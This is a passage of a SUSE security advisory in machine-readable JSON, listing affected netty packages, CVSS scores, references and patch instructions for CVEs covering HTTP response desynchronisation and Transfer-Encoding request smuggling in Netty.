"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42583",
"url": "https://www.suse.com/security/cve/CVE-2026-42583"
},
{
"category": "external",
"summary": "SUSE Bug 1265279 for CVE-2026-42583",
"url": "https://bugzilla.suse.com/1265279"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-09T08:13:58Z",
"details": "important"
}
],
"title": "CVE-2026-42583"
},
{
"cve": "CVE-2026-42584",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42584"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpClientCodec pairs each inbound response with an outbound request by queue.poll() once per response, including for 1xx. If the client pipelines GET then HEAD and the server sends 103, then 200 with GET body, then 200 for HEAD, the queue pairs HEAD with the first 200. The HEAD rule then skips reading that message\u0027s body, so the GET entity bytes stay on the stream and the following 200 is parsed from the wrong offset. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42584",
"url": "https://www.suse.com/security/cve/CVE-2026-42584"
},
{
"category": "external",
"summary": "SUSE Bug 1265280 for CVE-2026-42584",
"url": "https://bugzilla.suse.com/1265280"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-06-09T08:13:58Z",
"details": "moderate"
}
],
"title": "CVE-2026-42584"
},
{
"cve": "CVE-2026-42585",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42585"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty incorrectly parses malformed Transfer-Encoding, enabling request smuggling attacks. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x",
"SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le",
"SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42585",
